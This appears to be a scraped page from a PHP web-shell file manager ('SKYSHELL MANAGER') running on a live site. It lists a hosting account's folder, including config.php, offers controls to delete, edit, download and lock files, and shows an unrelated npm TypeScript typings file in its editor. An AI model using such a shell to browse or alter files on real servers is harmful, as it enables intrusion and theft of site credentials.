📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
24303.26 KB
0644
🗑️
⬇️
✏️
🔒
Editing: index.d.ts
import getSideChannelList from 'side-channel-list'; import getSideChannelMap from 'side-channel-map'; import getSideChannelWeakMap from 'side-channel-weakmap'; declare namespace getSideChannel { type Channel<K, V> = | getSideChannelList.Channel<K, V> | ReturnType<Exclude<typeof getSideChannelMap<K, V>, false>> | ReturnType<Exclude<typeof getSideChannelWeakMap<K, V>, false>>; } declare function getSideChannel<K, V>(): getSideChannel.Channel<K, V>; export = getSideChannel;
💾 Save Changes